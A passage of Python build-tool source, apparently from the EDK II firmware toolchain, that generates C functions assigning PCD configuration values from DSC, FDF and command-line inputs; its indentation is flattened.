CApp = CApp + ' memcpy (&%s, Value, (FieldSize > 0 && FieldSize < %d) ? FieldSize : %d);\n' % (indicator, ValueSize, ValueSize)
elif isinstance(Value, str):
CApp = CApp + ' %s = %s; // From %s Line %d Value %s\n' % (indicator, Value, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
else:
if '[' in FieldName and ']' in FieldName:
Index = int(FieldName.split('[')[1].split(']')[0])
CApp = CApp + ' __STATIC_ASSERT((%d < __ARRAY_SIZE(Pcd->%s)) || (__ARRAY_SIZE(Pcd->%s) == 0), "array index exceeds the array number"); // From %s Line %d Index of %s\n' % (Index, FieldName.split('[')[0], FieldName.split('[')[0], FieldList[FieldName][1], FieldList[FieldName][2], FieldName)
if ValueSize > 4:
CApp = CApp + ' %s = %dULL; // From %s Line %d Value %s\n' % (indicator, Value, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
else:
CApp = CApp + ' %s = %d; // From %s Line %d Value %s\n' % (indicator, Value, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
CApp = CApp + "}\n"
return CApp
@staticmethod
def GenerateDefaultValueAssignStatement(Pcd):
CApp = ' Assign_%s_%s_Default_Value(Pcd);\n' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName)
return CApp
def GetPcdDscRawDefaultValue(self,Pcd, SkuName,DefaultStoreName):
if Pcd.Type in PCD_DYNAMIC_TYPE_SET or Pcd.Type in PCD_DYNAMIC_EX_TYPE_SET:
if (SkuName, DefaultStoreName) == (TAB_DEFAULT, TAB_DEFAULT_STORES_DEFAULT):
pcddefaultvalue = Pcd.DefaultFromDSC.get(TAB_DEFAULT, {}).get(TAB_DEFAULT_STORES_DEFAULT) if Pcd.DefaultFromDSC else None
else:
pcddefaultvalue = Pcd.DscRawValue.get(SkuName, {}).get(DefaultStoreName)
else:
pcddefaultvalue = Pcd.DscRawValue.get(SkuName, {}).get(TAB_DEFAULT_STORES_DEFAULT)
return pcddefaultvalue
def GetPcdDscRawValueInfo(self,Pcd, SkuName,DefaultStoreName):
DscValueInfo = Pcd.DscRawValueInfo.get(SkuName, {}).get(DefaultStoreName)
if DscValueInfo:
dscfilepath,lineno = DscValueInfo
else:
dscfilepath = self.MetaFile.File
lineno = ""
return dscfilepath,lineno
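## Generate the C function that assigns the DSC value of a PCD
#
#   Emits Assign_<Guid>_<Name>_<Sku>_<Store>_Value(), which copies the DSC
#   default value for the given SKU and default store into the PCD buffer.
#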
def GenerateInitValueFunction(self, Pcd, SkuName, DefaultStoreName):
CApp = "// Value in Dsc for Sku: %s, DefaultStore %s\n" % (SkuName, DefaultStoreName)
CApp = CApp + "void Assign_%s_%s_%s_%s_Value(%s *Pcd){\n" % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName, SkuName, DefaultStoreName, Pcd.BaseDatumType)
CApp = CApp + ' UINT32 FieldSize;\n'
CApp = CApp + ' CHAR8 *Value;\n'
CApp = CApp + ' UINT32 PcdArraySize;\n'
CApp = CApp + "// SkuName: %s, DefaultStoreName: %s \n" % (TAB_DEFAULT, TAB_DEFAULT_STORES_DEFAULT)
inherit_OverrideValues = Pcd.SkuOverrideValues[SkuName]
dscfilepath,lineno = self.GetPcdDscRawValueInfo(Pcd, SkuName, DefaultStoreName)
if lineno:
valuefrom = "%s Line %s" % (dscfilepath,str(lineno))
else:
valuefrom = dscfilepath
pcddefaultvalue = self.GetPcdDscRawDefaultValue(Pcd, SkuName, DefaultStoreName)
if pcddefaultvalue:
FieldList = pcddefaultvalue
IsArray = _IsFieldValueAnArray(FieldList)
if IsArray:
if "{CODE(" not in FieldList:
try:
FieldList = ValueExpressionEx(FieldList, TAB_VOID)(True)
except BadExpression:
EdkLogger.error("Build", FORMAT_INVALID, "Invalid value format for %s.%s, from DSC: %s" %
(Pcd.TokenSpaceGuidCName, Pcd.TokenCName, FieldList))
Value, ValueSize = ParseFieldValue (FieldList)
if (SkuName, DefaultStoreName) == (TAB_DEFAULT, TAB_DEFAULT_STORES_DEFAULT):
if isinstance(Value, str):
if "{CODE(" in Value:
if Pcd.IsArray() and Pcd.Capacity[-1] != "-1":
pcdarraysize = Pcd.PcdArraySize()
CApp = CApp + '__STATIC_ASSERT(sizeof(%s_%s_%s_%s_Value) < %d * sizeof(%s), "Pcd %s.%s Value in Dsc exceed the array capability %s"); // From %s \n' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,SkuName, DefaultStoreName,pcdarraysize,Pcd.BaseDatumType,Pcd.TokenSpaceGuidCName, Pcd.TokenCName,Pcd.DatumType, valuefrom)
CApp = CApp+ ' PcdArraySize = sizeof(%s_%s_%s_%s_Value);\n ' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,SkuName, DefaultStoreName)
CApp = CApp + ' memcpy (Pcd, &%s_%s_%s_%s_Value,PcdArraySize);\n ' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,SkuName, DefaultStoreName)
else:
CApp = CApp + ' Pcd = %s; // From DSC Default Value %s\n' % (Value, Pcd.DefaultFromDSC.get(TAB_DEFAULT, {}).get(TAB_DEFAULT_STORES_DEFAULT, Pcd.DefaultValue) if Pcd.DefaultFromDSC else Pcd.DefaultValue)
elif IsArray:
#
# Use memcpy() to copy value into field
#
if Pcd.IsArray():
pcdarraysize = Pcd.PcdArraySize()
if "{CODE(" in pcddefaultvalue:
if Pcd.Capacity[-1] != "-1":
CApp = CApp + '__STATIC_ASSERT(sizeof(%s_%s_%s_%s_Value) < %d * sizeof(%s), "Pcd %s.%s Value in Dsc exceed the array capability %s"); // From %s \n' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,SkuName, DefaultStoreName,pcdarraysize,Pcd.BaseDatumType,Pcd.TokenSpaceGuidCName, Pcd.TokenCName,Pcd.DatumType,valuefrom)
CApp = CApp + ' PcdArraySize = sizeof(%s_%s_%s_%s_Value);\n ' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,SkuName, DefaultStoreName)
CApp = CApp + ' memcpy (Pcd, %s_%s_%s_%s_Value, PcdArraySize);\n' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,SkuName, DefaultStoreName)
else:
if Pcd.Capacity[-1] != "-1":
CApp = CApp + '__STATIC_ASSERT(%d < %d * sizeof(%s), "Pcd %s.%s Value in Dsc exceed the array capability %s"); // From %s \n' % (ValueSize,pcdarraysize,Pcd.BaseDatumType,Pcd.TokenSpaceGuidCName, Pcd.TokenCName,Pcd.DatumType,valuefrom)
CApp = CApp + ' PcdArraySize = %d;\n' % ValueSize
CApp = CApp + ' Value = %s; // From DSC Default Value %s\n' % (DscBuildData.IntToCString(Value, ValueSize), Pcd.DefaultFromDSC.get(TAB_DEFAULT, {}).get(TAB_DEFAULT_STORES_DEFAULT, Pcd.DefaultValue) if Pcd.DefaultFromDSC else Pcd.DefaultValue)
CApp = CApp + ' memcpy (Pcd, Value, PcdArraySize);\n'
else:
if "{CODE(" in pcddefaultvalue:
CApp = CApp + ' PcdArraySize = %d < sizeof(%s) * %d ? %d: sizeof(%s) * %d;\n ' % (ValueSize,Pcd.BaseDatumType,pcdarraysize,ValueSize,Pcd.BaseDatumType,pcdarraysize)
CApp = CApp + ' memcpy (Pcd, &%s_%s_%s_%s_Value, PcdArraySize);\n' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,SkuName, DefaultStoreName)
else:
CApp = CApp + ' Value = %s; // From DSC Default Value %s\n' % (DscBuildData.IntToCString(Value, ValueSize), Pcd.DefaultFromDSC.get(TAB_DEFAULT, {}).get(TAB_DEFAULT_STORES_DEFAULT, Pcd.DefaultValue) if Pcd.DefaultFromDSC else Pcd.DefaultValue)
CApp = CApp + ' memcpy (Pcd, Value, %d);\n' % (ValueSize)
else:
if isinstance(Value, str):
if "{CODE(" in Value:
if Pcd.IsArray() and Pcd.Capacity[-1] != "-1":
pcdarraysize = Pcd.PcdArraySize()
CApp = CApp + '__STATIC_ASSERT(sizeof(%s_%s_%s_%s_Value) < %d * sizeof(%s), "Pcd %s.%s Value in Dsc exceed the array capability %s"); // From %s \n' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,SkuName, DefaultStoreName,pcdarraysize,Pcd.BaseDatumType,Pcd.TokenSpaceGuidCName, Pcd.TokenCName,Pcd.DatumType,valuefrom)
CApp = CApp + ' PcdArraySize = sizeof(%s_%s_%s_%s_Value);\n '% (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,SkuName, DefaultStoreName)
CApp = CApp + ' memcpy (Pcd, &%s_%s_%s_%s_Value, PcdArraySize);\n' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,SkuName, DefaultStoreName)
else:
CApp = CApp + ' Pcd = %s; // From DSC Default Value %s\n' % (Value, Pcd.DscRawValue.get(SkuName, {}).get(DefaultStoreName))
elif IsArray:
#
# Use memcpy() to copy value into field
#
if Pcd.IsArray():
pcdarraysize = Pcd.PcdArraySize()
if "{CODE(" in pcddefaultvalue:
if Pcd.Capacity[-1] != "-1":
CApp = CApp + '__STATIC_ASSERT(sizeof(%s_%s_%s_%s_Value) < %d * sizeof(%s), "Pcd %s.%s Value in Dsc exceed the array capability %s"); // From %s \n' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,SkuName, DefaultStoreName,pcdarraysize,Pcd.BaseDatumType,Pcd.TokenSpaceGuidCName, Pcd.TokenCName,Pcd.DatumType,valuefrom)
CApp = CApp + ' PcdArraySize = sizeof(%s_%s_%s_%s_Value);\n ' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName, SkuName, DefaultStoreName)
CApp = CApp + ' memcpy (Pcd, %s_%s_%s_%s_Value, PcdArraySize);\n' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,SkuName, DefaultStoreName)
else:
if Pcd.Capacity[-1] != "-1":
CApp = CApp + '__STATIC_ASSERT(%d < %d * sizeof(%s), "Pcd %s.%s Value in Dsc exceed the array capability %s"); // From %s \n' % (ValueSize,pcdarraysize,Pcd.BaseDatumType,Pcd.TokenSpaceGuidCName, Pcd.TokenCName,Pcd.DatumType,valuefrom)
CApp = CApp + ' PcdArraySize = %d;\n' % ValueSize
CApp = CApp + ' Value = %s; // From DSC Default Value %s\n' % (DscBuildData.IntToCString(Value, ValueSize), Pcd.DscRawValue.get(TAB_DEFAULT, {}).get(TAB_DEFAULT_STORES_DEFAULT, Pcd.DefaultValue) if Pcd.DefaultFromDSC else Pcd.DefaultValue)
CApp = CApp + ' memcpy (Pcd, Value, PcdArraySize);\n'
else:
if "{CODE(" in pcddefaultvalue:
CApp = CApp + ' PcdArraySize = %d < sizeof(%s) * %d ? %d: sizeof(%s) * %d;\n ' % (ValueSize,Pcd.BaseDatumType,pcdarraysize,ValueSize,Pcd.BaseDatumType,pcdarraysize)
CApp = CApp + ' memcpy (Pcd, &%s_%s_%s_%s_Value, PcdArraySize);\n' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,SkuName, DefaultStoreName)
else:
CApp = CApp + ' Value = %s; // From DSC Default Value %s\n' % (DscBuildData.IntToCString(Value, ValueSize), Pcd.DscRawValue.get(SkuName, {}).get(DefaultStoreName))
CApp = CApp + ' memcpy (Pcd, Value, %d);\n' % (ValueSize)
inheritvalue = inherit_OverrideValues.get(DefaultStoreName)
if not inheritvalue:
inheritvalue = []
for index in inheritvalue:
FieldList = inheritvalue[index]
if not FieldList:
continue
if (SkuName, DefaultStoreName) == (TAB_DEFAULT, TAB_DEFAULT_STORES_DEFAULT) or (( (SkuName, '') not in Pcd.ValueChain) and ( (SkuName, DefaultStoreName) not in Pcd.ValueChain )):
for FieldName in FieldList:
indicator = self.GetIndicator(index, FieldName,Pcd)
IsArray = _IsFieldValueAnArray(FieldList[FieldName][0])
if IsArray:
try:
FieldList[FieldName][0] = ValueExpressionEx(FieldList[FieldName][0], TAB_VOID, self._GuidDict)(True)
except BadExpression:
EdkLogger.error('Build', FORMAT_INVALID, "Invalid value format for %s. From %s Line %d " %
(".".join((Pcd.TokenSpaceGuidCName, Pcd.TokenCName, FieldName)), FieldList[FieldName][1], FieldList[FieldName][2]))
try:
Value, ValueSize = ParseFieldValue (FieldList[FieldName][0])
except Exception:
EdkLogger.error('Build', FORMAT_INVALID, "Invalid value format for %s. From %s Line %d " % (".".join((Pcd.TokenSpaceGuidCName, Pcd.TokenCName, FieldName)), FieldList[FieldName][1], FieldList[FieldName][2]))
if isinstance(Value, str):
CApp = CApp + ' Pcd->%s = %s; // From %s Line %d Value %s\n' % (FieldName, Value, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
elif IsArray:
#
# Use memcpy() to copy value into field
#
CApp = CApp + ' FieldSize = __FIELD_SIZE(%s, %s);\n' % (Pcd.BaseDatumType, FieldName)
CApp = CApp + ' Value = %s; // From %s Line %d Value %s\n' % (DscBuildData.IntToCString(Value, ValueSize), FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
CApp = CApp + ' __STATIC_ASSERT((__FIELD_SIZE(%s, %s) >= %d) || (__FIELD_SIZE(%s, %s) == 0), "Input buffer exceeds the buffer array"); // From %s Line %d Value %s\n' % (Pcd.BaseDatumType, FieldName, ValueSize, Pcd.BaseDatumType, FieldName, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
CApp = CApp + ' memcpy (&%s, Value, (FieldSize > 0 && FieldSize < %d) ? FieldSize : %d);\n' % (indicator, ValueSize, ValueSize)
else:
if '[' in FieldName and ']' in FieldName:
Index = int(FieldName.split('[')[1].split(']')[0])
CApp = CApp + ' __STATIC_ASSERT((%d < __ARRAY_SIZE(Pcd->%s)) || (__ARRAY_SIZE(Pcd->%s) == 0), "array index exceeds the array number"); // From %s Line %d Index of %s\n' % (Index, FieldName.split('[')[0], FieldName.split('[')[0], FieldList[FieldName][1], FieldList[FieldName][2], FieldName)
if ValueSize > 4:
CApp = CApp + ' %s = %dULL; // From %s Line %d Value %s\n' % (indicator, Value, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
else:
CApp = CApp + ' %s = %d; // From %s Line %d Value %s\n' % (indicator, Value, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
CApp = CApp + "}\n"
return CApp
@staticmethod
def GenerateInitValueStatement(Pcd, SkuName, DefaultStoreName):
CApp = ' Assign_%s_%s_%s_%s_Value(Pcd);\n' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName, SkuName, DefaultStoreName)
return CApp
def GenerateCommandLineValue(self, Pcd):
CApp = "// Value in CommandLine\n"
CApp = CApp + "void Assign_%s_%s_CommandLine_Value(%s *Pcd){\n" % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName, Pcd.BaseDatumType)
CApp = CApp + ' UINT32 FieldSize;\n'
CApp = CApp + ' CHAR8 *Value;\n'
pcddefaultvalue = Pcd.PcdValueFromComm
for FieldList in [pcddefaultvalue, Pcd.PcdFieldValueFromComm]:
if not FieldList:
continue
if pcddefaultvalue and FieldList == pcddefaultvalue:
IsArray = _IsFieldValueAnArray(FieldList)
if IsArray:
try:
FieldList = ValueExpressionEx(FieldList, TAB_VOID)(True)
except BadExpression:
EdkLogger.error("Build", FORMAT_INVALID, "Invalid value format for %s.%s, from Command: %s" %
(Pcd.TokenSpaceGuidCName, Pcd.TokenCName, FieldList))
Value, ValueSize = ParseFieldValue (FieldList)
if isinstance(Value, str):
CApp = CApp + ' Pcd = %s; // From Command Line \n' % (Value)
elif IsArray:
#
# Use memcpy() to copy value into field
#
CApp = CApp + ' Value = %s; // From Command Line.\n' % (DscBuildData.IntToCString(Value, ValueSize))
CApp = CApp + ' memcpy (Pcd, Value, %d);\n' % (ValueSize)
continue
for FieldName in FieldList:
IsArray = _IsFieldValueAnArray(FieldList[FieldName][0])
if IsArray:
try:
FieldList[FieldName][0] = ValueExpressionEx(FieldList[FieldName][0], TAB_VOID, self._GuidDict)(True)
except BadExpression:
EdkLogger.error('Build', FORMAT_INVALID, "Invalid value format for %s. From %s Line %d " %
(".".join((Pcd.TokenSpaceGuidCName, Pcd.TokenCName, FieldName)), FieldList[FieldName][1], FieldList[FieldName][2]))
except:
print("error")
try:
Value, ValueSize = ParseFieldValue (FieldList[FieldName][0])
except Exception:
EdkLogger.error('Build', FORMAT_INVALID, "Invalid value format for %s. From %s Line %d " % (".".join((Pcd.TokenSpaceGuidCName, Pcd.TokenCName, FieldName)), FieldList[FieldName][1], FieldList[FieldName][2]))
if isinstance(Value, str):
CApp = CApp + ' Pcd->%s = %s; // From %s Line %d Value %s\n' % (FieldName, Value, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
elif IsArray:
#
# Use memcpy() to copy value into field
#
CApp = CApp + ' FieldSize = __FIELD_SIZE(%s, %s);\n' % (Pcd.BaseDatumType, FieldName)
CApp = CApp + ' Value = %s; // From %s Line %d Value %s\n' % (DscBuildData.IntToCString(Value, ValueSize), FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
CApp = CApp + ' __STATIC_ASSERT((__FIELD_SIZE(%s, %s) >= %d) || (__FIELD_SIZE(%s, %s) == 0), "Input buffer exceeds the buffer array"); // From %s Line %d Value %s\n' % (Pcd.BaseDatumType, FieldName, ValueSize, Pcd.BaseDatumType, FieldName, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
CApp = CApp + ' memcpy (&Pcd->%s, Value, (FieldSize > 0 && FieldSize < %d) ? FieldSize : %d);\n' % (FieldName, ValueSize, ValueSize)
else:
if '[' in FieldName and ']' in FieldName:
Index = int(FieldName.split('[')[1].split(']')[0])
CApp = CApp + ' __STATIC_ASSERT((%d < __ARRAY_SIZE(Pcd->%s)) || (__ARRAY_SIZE(Pcd->%s) == 0), "array index exceeds the array number"); // From %s Line %d Index of %s\n' % (Index, FieldName.split('[')[0], FieldName.split('[')[0], FieldList[FieldName][1], FieldList[FieldName][2], FieldName)
if ValueSize > 4:
CApp = CApp + ' Pcd->%s = %dULL; // From %s Line %d Value %s\n' % (FieldName, Value, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
else:
CApp = CApp + ' Pcd->%s = %d; // From %s Line %d Value %s\n' % (FieldName, Value, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
CApp = CApp + "}\n"
return CApp
@staticmethod
def GenerateCommandLineValueStatement(Pcd):
CApp = ' Assign_%s_%s_CommandLine_Value(Pcd);\n' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName)
return CApp
def GenerateFdfValue(self,Pcd):
CApp = "// Value in Fdf\n"
CApp = CApp + "void Assign_%s_%s_Fdf_Value(%s *Pcd){\n" % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,Pcd.BaseDatumType)
CApp = CApp + ' UINT32 FieldSize;\n'
CApp = CApp + ' CHAR8 *Value;\n'
pcddefaultvalue = Pcd.PcdValueFromFdf
for FieldList in [pcddefaultvalue,Pcd.PcdFieldValueFromFdf]:
if not FieldList:
continue
if pcddefaultvalue and FieldList == pcddefaultvalue:
IsArray = _IsFieldValueAnArray(FieldList)
if IsArray:
try:
FieldList = ValueExpressionEx(FieldList, TAB_VOID)(True)
except BadExpression:
EdkLogger.error("Build", FORMAT_INVALID, "Invalid value format for %s.%s, from Fdf: %s" %
(Pcd.TokenSpaceGuidCName, Pcd.TokenCName, FieldList))
Value, ValueSize = ParseFieldValue (FieldList)
if isinstance(Value, str):
CApp = CApp + ' Pcd = %s; // From Fdf \n' % (Value)
elif IsArray:
#
# Use memcpy() to copy value into field
#
CApp = CApp + ' Value = %s; // From Fdf .\n' % (DscBuildData.IntToCString(Value, ValueSize))
CApp = CApp + ' memcpy (Pcd, Value, %d);\n' % (ValueSize)
continue
for FieldName in FieldList:
IsArray = _IsFieldValueAnArray(FieldList[FieldName][0])
if IsArray:
try:
FieldList[FieldName][0] = ValueExpressionEx(FieldList[FieldName][0], TAB_VOID, self._GuidDict)(True)
except BadExpression:
EdkLogger.error('Build', FORMAT_INVALID, "Invalid value format for %s. From %s Line %d " %
(".".join((Pcd.TokenSpaceGuidCName, Pcd.TokenCName, FieldName)), FieldList[FieldName][1], FieldList[FieldName][2]))
except:
print("error")
try:
Value, ValueSize = ParseFieldValue (FieldList[FieldName][0])
except Exception:
EdkLogger.error('Build', FORMAT_INVALID, "Invalid value format for %s. From %s Line %d " % (".".join((Pcd.TokenSpaceGuidCName,Pcd.TokenCName,FieldName)),FieldList[FieldName][1], FieldList[FieldName][2]))
if isinstance(Value, str):
CApp = CApp + ' Pcd->%s = %s; // From %s Line %d Value %s\n' % (FieldName, Value, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
elif IsArray:
#
# Use memcpy() to copy value into field
#
CApp = CApp + ' FieldSize = __FIELD_SIZE(%s, %s);\n' % (Pcd.BaseDatumType, FieldName)
CApp = CApp + ' Value = %s; // From %s Line %d Value %s\n' % (DscBuildData.IntToCString(Value, ValueSize), FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
CApp = CApp + ' __STATIC_ASSERT((__FIELD_SIZE(%s, %s) >= %d) || (__FIELD_SIZE(%s, %s) == 0), "Input buffer exceeds the buffer array"); // From %s Line %d Value %s\n' % (Pcd.BaseDatumType, FieldName, ValueSize, Pcd.BaseDatumType, FieldName, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
CApp = CApp + ' memcpy (&Pcd->%s, Value, (FieldSize > 0 && FieldSize < %d) ? FieldSize : %d);\n' % (FieldName, ValueSize, ValueSize)
else:
if '[' in FieldName and ']' in FieldName:
Index = int(FieldName.split('[')[1].split(']')[0])
CApp = CApp + ' __STATIC_ASSERT((%d < __ARRAY_SIZE(Pcd->%s)) || (__ARRAY_SIZE(Pcd->%s) == 0), "array index exceeds the array number"); // From %s Line %d Index of %s\n' % (Index, FieldName.split('[')[0], FieldName.split('[')[0], FieldList[FieldName][1], FieldList[FieldName][2], FieldName)
if ValueSize > 4:
CApp = CApp + ' Pcd->%s = %dULL; // From %s Line %d Value %s\n' % (FieldName, Value, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
else:
CApp = CApp + ' Pcd->%s = %d; // From %s Line %d Value %s\n' % (FieldName, Value, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
CApp = CApp + "}\n"
return CApp
@staticmethod
def GenerateFdfValueStatement(Pcd):
CApp = ' Assign_%s_%s_Fdf_Value(Pcd);\n' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName)
return CApp
def GenerateInitializeFunc(self, SkuName, DefaultStore, Pcd, InitByteValue, CApp):
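# Emits one Initialize_<SkuName>_<DefaultStoreName>_<TokenSpaceGuid>_<TokenCName>() C function per
# default store: it fetches the current PCD buffer with PcdGetPtr(), resizes it, layers the
# default-value, per-SKU/default-store, FDF and command-line assignments, then writes the result
# back with PcdSetPtr(). The PCD's DEC default is also appended to InitByteValue, which later
# becomes the Input.txt fed to the generated value-init tool.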
OverrideValues = {DefaultStore:{}}
if Pcd.SkuOverrideValues:
OverrideValues = Pcd.SkuOverrideValues[SkuName]
if not OverrideValues:
OverrideValues = {TAB_DEFAULT_STORES_DEFAULT:Pcd.DefaultValues}
for DefaultStoreName in OverrideValues:
CApp = CApp + 'void\n'
CApp = CApp + 'Initialize_%s_%s_%s_%s(\n' % (SkuName, DefaultStoreName, Pcd.TokenSpaceGuidCName, Pcd.TokenCName)
CApp = CApp + ' void\n'
CApp = CApp + ' )\n'
CApp = CApp + '{\n'
CApp = CApp + ' UINT32 Size;\n'
CApp = CApp + ' UINT32 FieldSize;\n'
CApp = CApp + ' CHAR8 *Value;\n'
CApp = CApp + ' UINT32 OriginalSize;\n'
CApp = CApp + ' VOID *OriginalPcd;\n'
CApp = CApp + ' %s *Pcd; // From %s Line %d \n' % (Pcd.BaseDatumType,Pcd.PkgPath, Pcd.PcdDefineLineNo)
CApp = CApp + '\n'
PcdDefaultValue = StringToArray(Pcd.DefaultValueFromDec.strip())
InitByteValue += '%s.%s.%s.%s|%s|%s\n' % (SkuName, DefaultStoreName, Pcd.TokenSpaceGuidCName, Pcd.TokenCName, Pcd.DatumType, PcdDefaultValue)
#
# Get current PCD value and size
#
CApp = CApp + ' OriginalPcd = PcdGetPtr (%s, %s, %s, %s, &OriginalSize);\n' % (SkuName, DefaultStoreName, Pcd.TokenSpaceGuidCName, Pcd.TokenCName)
#
# Determine the size of the PCD. For simple structures, sizeof(TYPE) provides
# the correct value. For structures with a flexible array member, the flexible
# array member is detected, and the size is based on the highest index used with
# the flexible array member. The flexible array member must be the last field
# in a structure. The size formula for this case is:
# OFFSET_OF(FlexibleArrayField) + sizeof(FlexibleArray[0]) * (HighestIndex + 1)
#
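# Illustrative example (hypothetical struct, not taken from any DSC): for
#   typedef struct { UINT32 Count; UINT8 Data[]; } EXAMPLE;
# with Data[7] as the highest referenced index, the computed size would be
#   OFFSET_OF(Data) + sizeof(Data[0]) * (7 + 1) = 4 + 1 * 8 = 12 bytes.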
CApp = CApp + DscBuildData.GenerateSizeStatments(Pcd,SkuName,DefaultStoreName)
if Pcd.IsArray() and Pcd.Capacity[-1] != "-1":
CApp = CApp + ' OriginalSize = OriginalSize < sizeof(%s) * %d? OriginalSize:sizeof(%s) * %d; \n' % (Pcd.BaseDatumType,Pcd.PcdArraySize(),Pcd.BaseDatumType,Pcd.PcdArraySize())
CApp = CApp + ' Size = sizeof(%s) * %d; \n' % (Pcd.BaseDatumType,Pcd.PcdArraySize())
#
# Allocate and zero buffer for the PCD
# Must handle cases where current value is smaller, larger, or same size
# Always keep the larger one as the current size
#
CApp = CApp + ' Size = (OriginalSize > Size ? OriginalSize : Size);\n'
CApp = CApp + ' Pcd = (%s *)malloc (Size);\n' % (Pcd.BaseDatumType,)
CApp = CApp + ' memset (Pcd, 0, Size);\n'
#
# Copy current PCD value into allocated buffer.
#
CApp = CApp + ' memcpy (Pcd, OriginalPcd, OriginalSize);\n'
#
# Assign field values in PCD
#
CApp = CApp + DscBuildData.GenerateDefaultValueAssignStatement(Pcd)
if Pcd.Type not in [self._PCD_TYPE_STRING_[MODEL_PCD_FIXED_AT_BUILD],
self._PCD_TYPE_STRING_[MODEL_PCD_PATCHABLE_IN_MODULE]]:
for skuname in self.SkuIdMgr.GetSkuChain(SkuName):
storeset = [DefaultStoreName] if DefaultStoreName == TAB_DEFAULT_STORES_DEFAULT else [TAB_DEFAULT_STORES_DEFAULT, DefaultStoreName]
for defaultstorenameitem in storeset:
CApp = CApp + "// SkuName: %s, DefaultStoreName: %s \n" % (skuname, defaultstorenameitem)
CApp = CApp + DscBuildData.GenerateInitValueStatement(Pcd, skuname, defaultstorenameitem)
if skuname == SkuName:
break
else:
CApp = CApp + "// SkuName: %s, DefaultStoreName: STANDARD \n" % self.SkuIdMgr.SystemSkuId
CApp = CApp + DscBuildData.GenerateInitValueStatement(Pcd, self.SkuIdMgr.SystemSkuId, TAB_DEFAULT_STORES_DEFAULT)
CApp = CApp + DscBuildData.GenerateFdfValueStatement(Pcd)
CApp = CApp + DscBuildData.GenerateCommandLineValueStatement(Pcd)
#
# Set new PCD value and size
#
CApp = CApp + ' PcdSetPtr (%s, %s, %s, %s, Size, (void *)Pcd);\n' % (SkuName, DefaultStoreName, Pcd.TokenSpaceGuidCName, Pcd.TokenCName)
#
# Free PCD
#
CApp = CApp + ' free (Pcd);\n'
CApp = CApp + '}\n'
CApp = CApp + '\n'
return InitByteValue, CApp
def GenerateArrayAssignment(self, Pcd):
CApp = ""
if not Pcd:
return CApp
Demesion = ""
for d in Pcd.Capacity:
Demesion += "[]"
Value = Pcd.DefaultValueFromDec
if "{CODE(" in Pcd.DefaultValueFromDec:
realvalue = Pcd.DefaultValueFromDec.strip()[6:-2]  # strip the "{CODE(" prefix and ")}" suffix
CApp += "static %s %s_%s_INIT_Value%s = %s;\n" % (Pcd.BaseDatumType,Pcd.TokenSpaceGuidCName,Pcd.TokenCName,Demesion,realvalue)
if Pcd.Type in PCD_DYNAMIC_TYPE_SET | PCD_DYNAMIC_EX_TYPE_SET:
for skuname in Pcd.SkuInfoList:
skuinfo = Pcd.SkuInfoList[skuname]
if skuinfo.VariableName:
for defaultstore in skuinfo.DefaultStoreDict:
pcddscrawdefaultvalue = self.GetPcdDscRawDefaultValue(Pcd, skuname, defaultstore)
if pcddscrawdefaultvalue:
Value = skuinfo.DefaultStoreDict[defaultstore]
if "{CODE(" in Value:
realvalue = Value.strip()[6:-2]  # strip the "{CODE(" prefix and ")}" suffix
CApp += "static %s %s_%s_%s_%s_Value%s = %s;\n" % (Pcd.BaseDatumType,Pcd.TokenSpaceGuidCName,Pcd.TokenCName,skuname,defaultstore,Demesion,realvalue)
else:
pcddscrawdefaultvalue = self.GetPcdDscRawDefaultValue(Pcd, skuname, TAB_DEFAULT_STORES_DEFAULT)
if pcddscrawdefaultvalue:
Value = skuinfo.DefaultValue
if "{CODE(" in Value:
realvalue = Value.strip()[6:-2]  # strip the "{CODE(" prefix and ")}" suffix
CApp += "static %s %s_%s_%s_%s_Value%s = %s;\n" % (Pcd.BaseDatumType,Pcd.TokenSpaceGuidCName,Pcd.TokenCName,skuname,TAB_DEFAULT_STORES_DEFAULT,Demesion,realvalue)
else:
pcddscrawdefaultvalue = self.GetPcdDscRawDefaultValue(Pcd, TAB_DEFAULT, TAB_DEFAULT_STORES_DEFAULT)
if pcddscrawdefaultvalue:
if "{CODE(" in Pcd.DefaultValue:
realvalue = Pcd.DefaultValue.strip()[6:-2]  # strip the "{CODE(" prefix and ")}" suffix
